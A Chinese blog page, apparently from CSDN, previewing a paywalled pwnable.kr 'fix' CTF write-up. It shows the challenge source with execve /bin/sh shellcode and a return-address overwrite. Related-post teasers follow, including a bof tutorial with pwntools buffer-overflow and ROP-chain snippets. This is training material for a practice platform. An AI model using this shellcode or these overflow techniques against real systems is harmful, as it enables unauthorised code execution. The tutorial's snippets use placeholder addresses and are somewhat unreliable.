pwnable.kr-fix

最新推荐文章于 2024-09-07 09:56:34 发布
原创 最新推荐文章于 2024-09-07 09:56:34 发布 · 946 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf #pwn #二进制 #软件安全 #writeup

这篇博客详细介绍了在pwnable.kr挑战中遇到的一个改代码题目,需要深入汇编知识来解决。作者分析源码和反汇编代码,发现执行过程中代码会变化,导致执行失败。通过修改特定字节使指令跳转,成功执行但产生额外参数。解决方案是创建与错误提示相同的文件,利用栈上数据作为参数,实现正确执行。

前言

看似简单的改代码题,但是还是需要强大的汇编知识。花了很长时间,主要是自己对指令不是很熟悉。另外pwnable.kr的练习我会在另一个博客http://www.ktstartblog.top持续更新欢迎大家来踩。

分析

先分析源码fix.c

#include <stdio.h>

// 23byte shellcode from http://shell-storm.org/shellcode/files/shellcode-827.php
char sc[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
        "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

void shellcode(){
    // a buffer we are about to exploit!
    char buf[20];

    // prepare shellcode on executable stack!
    strcpy(buf, sc);

    // overwrite return address!
    *(int*)(buf+32) = buf;

    printf("get shell\n");
}

int main(){
        printf("What the hell is wrong with my shellcode??????\n");
        printf("I just copied and pasted it from shell-storm.org :(\n");
        printf("Can you fix it for
最低0.47元/天 解锁文章
pwnable.kr 入门pwn系列教程(1)
NoOneGroup
07-24 3483
博客已经转移 https://noone-hub.github.io/ 前言: 前段时间学了一段时间pwn,因为某些事断了下来,现在开始重新学习,现在立志要真正入门pwn,会编写漏洞利用(利用pwntools),会基本linux命令,因为pwn题目很多都是在linux下的,比较少在windows下。 正文: 今天通过pwnable.kr的第一道题目fd来学习pwn 题目就是这样,题目最...
pwnable.kr】0x05-passcode Writeup
weixin_64667536的博客
08-30 573
Ubuntu-SSH连接根据目录信息拉取文件。
pwnable.kr】 crypto1
子曰小玖的博客
06-10 863
https://r00tnb.github.io/2018/04/24/pwnable.kr-crypto1/ 前言 这虽然不是一道二进制的题目,但是也有足够的pwn味道。 分析 题目是用了python写的b/s结构,代码逻辑简单。client.py 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24...
pwnable.kr-----解题过程】collision
lyuchen65的博客
09-16 2629
#include #include unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i<5; i++){ res += ip[i]; } return res; } in
Pwnable.tw WP
AlexYoung28的博客
08-18 1006
Pwnable.tw start 我们分析上图程序的汇编代码: 上图中的第一个方框,其实是将 : Let's start the CTF:  这句字符串压进栈; 第二个方框:其实是 system_write()函数, 参数中 fd =1, 说明是标准输出,也就是将 字符串打印输出在屏幕上; 第三个方框: 其实 标准输入函数,允许输入的长度是 3ch 也就是 60个字节; 但是buffe...
pwnable_hacknote
m0_73756460的博客
02-22 265
buu刷题pwnable_hacknote【wp】
pwnable.kr】0x02-collision Writeup
weixin_64667536的博客
08-20 514
拉取文件分析源码阅读源码后,执行样例测试输入2个参数1个参数,程序输出如下。
pwnable.kr】0x01-fd Writeup
weixin_64667536的博客
08-20 355
Ubuntu连接靶机(连不通的可以试一下proxychains)scp命令拷贝下fd源码文件。
pwnable.kr做题笔记(一)
has_zaoganmaqule的博客
08-12 2126
调用 `printf` 函数,`bl` 指令用于分支并链接,保存返回地址到链接寄存器 `lr`。- 将 `r4`, `r11`, 和 `lr` 寄存器的值压入栈中,用于保存函数调用前的状态。- 将 `r3` 的值(0)存储到 `r11` 指向的位置的偏移量 -16 处。- 如果 `r2` 和 `r3` 不相等,跳转到 `0x8da8` 地址处。- 调用 `scanf` 函数,`r0` 和 `r1` 作为参数传递。- 从 `r11` 指向的位置的偏移量 -16 处加载值到 `r3`。
做的第一道pwn
LL021101的博客
03-20 1573
做题步骤 一、使用Ubuntu,对pwn文件进行扫瞄; file语句主要用来看本文件是多少位的,是不是elf文件——ELF文件详解—初步认识_code&poetry的博客-CSDN博客_elf文件,(该链接详细介绍了elf文件的基本结构),图中显示64-bit,意思是64位的文件 checksec命令是用来查看该文件有哪些保护措施。 NX(DEP):数据执行防护 Canary(FS):栈溢出保护 RELRO(ASLR):(地址随机化) PIE(代码地址随机化)...
kpd-scripts
03-20
Ando#6372编写的KPD脚本 使用方法:这些脚本仅可在idkr客户端中使用。 GitHub链接: : 我已经阅读了源代码,其中没有什么不好的(记录器,嗅探器等)。编译的版本由Github自动生成(“动作”标签),因此开发人员不能包含有害代码。如果您仍然不信任Github上的版本,那么我已经自己编译了一个。下载链接: : 一旦idkr客户端有更多更新,我将更新此可执行文件。如果您不希望自动更新,请跳过更新模式。 使用方法:安装idkr客户端,然后在idkr设置选项卡中启用用户脚本。关闭客户端。要安装用户密码,请以zip格式下载代码,然后将两个.js文件拖至Documents / idkr / scripts 启动客户端。几乎所有内容都是可定制的,请打开idkr设置选项卡,然后在“ KPD”选项卡中修改设置。这样会迎接新用户。 设置您的首选项并重新加载窗口(F5或F6)。 其他i
天马口算题训练软件 v1.0.zip
07-11
天马口算题训练软件是专门针对小学数学口算题设计的一套软件,题型丰富,软件功能设计人性化,适合小学生进行口算题训练和检验。 天马口算题训练软件功能特点 1、题型丰富 包括加法、减法、乘法、除法、加减乘除、带括号的加减乘除、余数除法以及整数、小数等多种训练题型,基本涵盖小学全部口算题题型,可自由设置数据范围、数据个数以及小数位数,具有很强的灵活性。 2、倒计时功能 可设置要训练的题目数,并设定答题时间,倒计时结束自动交卷,训练小朋友的答题速度。 3、题目统计功能 每次答题都自动统计答题结果并形成答题记录,包括题目、大题答案、正确答案和题目对错判定,并给出最后正确率、错误率、完成率以及得分,方便家长查看答题质量,查找错误 4、软件换肤功能 软件界面功能丰富,本身自带3套皮肤,可自由切换,并可以到官网下载更多皮肤,也可以自定义软件皮肤,丰富多彩的皮肤切换可消除小朋友视觉疲劳 天马口算题训练软件截图
FME创建循环及双重循环
Tardis
12-27 3051
文章目录前言一、FME中创建循环1.1 单重循环1.2 双重循环二、总结 前言 创建循环是在地理空间数据处理过程中经常会遇到的一种情况。在程序开发中通常使用"for"语句或者“loop”语句,通过对某一条件的判断来控制循环次数。创建循环的过程中,变量的变化情况和循环的终止条件十分重要。一个合理的变量变化和终止条件决定了循环的效率,以及是否会出现死循环。在FME中创建循环需要通过自定义转换器以及“L...
探索无限可能:kr-scripts —— 开源的玩机神器
gitblog_00747的博客
09-07 471
探索无限可能:kr-scripts —— 开源的玩机神器 在追求个性化和技术深度探索的今天,kr-scripts应运而生,为每位根深蒂固的Android发烧友提供了一个全新的舞台。本文将带你深入了解这一创新框架,让我们一起解锁Root权限下的无限潜能。 项目介绍 kr-scripts,一个革命性的开源项目,旨在简化Android应用开发流程,特别是针对那些渴望利用ROOT权限来打造个性工具的开发者...
hackinglab.cn脚本关之二
r00tnb的博客
12-17 2040
题目: 小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢? writeup: 点进去一看,是要在两秒内计算一个式子:5462*1673+942*(5462+1673)=随便填一个数字,提交后必须在2秒钟内提交!想着数字应该不会固定,刷新了页面发现,数字果然变了,但是运算符
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
我的渗透学习实验(一)
r00tnb的博客
01-26 1126
这次的渗透实验是在i春秋的在线挑战上做的,这是第一关,以后还会继续写一些自己的渗透学习过程,就当练习后的总结吧!写的可能不好有错误,希望大家指正,还有这些只是对自己实验的记录,如果大家要学习的话还是上i春秋吧,我怕误导大家(ps:i春秋真是一个学习的好网站!另外,我还是个新手。。。。) 题目:我很简单,请不要欺负我 要求:拿到服务器的权限 由于是渗透测试入门的题目,所以漏洞就很多。但是,
[pwnable.kr] input
ACdream
08-03 2799
网上最全的题解在这:input题解 知识点细节看上面那个题解就好了,非常详细 细节问题折腾好久,来学习一下: 如何把input文件放上去?有两种方法: A:WinSCP,注意tmp文件我们没有足够权限,只有把文件放进去的权限,拖进去了就好 B:用scp命令,推荐个学习博客:scp命令学习 注意哦,修改端口是大写 scp -P 2222 inputpwn.c input@p
pwnable.kr bof
最新发布
09-16
### pwnable.kr bof题目概述 pwnable.kr 是一个著名的在线渗透测试练习平台,bof(Buffer Overflow,缓冲区溢出)题目是其中经典类型。缓冲区溢出通常是由于程序没有正确检查用户输入的长度,导致输入的数据超出了缓冲区的边界,从而覆盖相邻的内存区域,可能改变程序的执行流程。 ### 解题思路与步骤 #### 1. 环境准备 首先需要在本地搭建好调试环境,安装必要的工具,如`gdb`(GNU调试器)、`pwntools`(Python 库,用于编写漏洞利用脚本)等。例如,使用`pwntools`可以方便地与远程服务器进行交互。 ```python from pwn import * # 连接到远程服务器 p = remote('pwnable.kr', 9000) ``` #### 2. 分析程序 - **反汇编**:使用`objdump`或`gdb`对目标程序进行反汇编,查看程序的汇编代码,了解程序的逻辑和函数调用关系。例如,使用`objdump -d bof`可以得到程序的反汇编代码。 - **检查漏洞点**:重点关注程序中存在缓冲区操作的函数,如`gets`、`strcpy`等,这些函数通常不检查输入的长度,容易引发缓冲区溢出漏洞。 #### 3. 确定缓冲区大小 通过调试程序,向程序输入不同长度的数据,观察程序的行为,确定缓冲区的大小。可以使用`gdb`设置断点,在关键位置查看栈的状态。 ```python # 构造不同长度的测试数据 test_data = 'A' * 10 p.sendline(test_data) ``` #### 4. 覆盖返回地址 当确定了缓冲区大小后,构造恶意输入,覆盖程序的返回地址。返回地址是函数调用结束后程序要跳转执行的地址,通过覆盖它可以改变程序的执行流程。 ```python # 计算返回地址的偏移量 offset = 44 # 假设偏移量为 44 # 构造恶意输入 payload = 'A' * offset # 获取目标地址(如系统函数地址) target_address = p64(0xdeadbeef) payload += target_address p.sendline(payload) ``` #### 5. 利用漏洞执行任意代码 - **调用系统函数**:如果程序中存在可利用的系统函数(如`system`),可以通过覆盖返回地址,将程序的执行流程引导到这些函数上,并传入合适的参数(如`/bin/sh`),从而获得一个 shell。 - **ROP 链**:如果程序中没有合适的系统函数可以直接调用,可以使用 ROP(Return Oriented Programming,面向返回编程)技术,通过拼接多个小的代码片段(gadget)来实现复杂的功能。 ```python # 构造 ROP 链 rop = ROP(elf) # 查找合适的 gadget pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0] bin_sh = next(elf.search(b'/bin/sh')) system_addr = elf.symbols['system'] # 构造 ROP 链 rop.raw(pop_rdi) rop.raw(bin_sh) rop.raw(system_addr) # 构造最终的 payload payload = 'A' * offset + str(rop) p.sendline(payload) ``` ### 技术分析 #### 缓冲区溢出原理 缓冲区溢出是由于程序对输入数据的长度没有进行有效的检查,导致输入的数据超出了缓冲区的边界,覆盖了相邻的内存区域。在栈上,函数调用时会保存返回地址等信息,当缓冲区溢出发生时,返回地址可能被覆盖,从而改变程序的执行流程。 #### 栈布局与内存管理 了解栈的布局对于利用缓冲区溢出漏洞至关重要。栈是一种后进先出的数据结构,函数调用时会在栈上分配空间,保存局部变量、参数和返回地址等信息。通过调试和分析栈的状态,可以确定缓冲区的位置和返回地址的偏移量。 #### 保护机制绕过 现代操作系统和编译器通常会采用一些保护机制,如 ASLR(地址空间布局随机化)、Canary(栈保护)等,来防止缓冲区溢出漏洞的利用。在解题过程中,需要了解这些保护机制,并寻找相应的绕过方法。例如,对于 ASLR,可以通过泄露程序的基地址来绕过;对于 Canary,可以通过泄露 Canary 的值来绕过。 ### 总结 解决 pwnable.kr 的 bof 题目需要掌握缓冲区溢出的基本原理、调试技巧和漏洞利用技术。通过不断地练习和实践,可以提高对漏洞的分析和利用能力。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值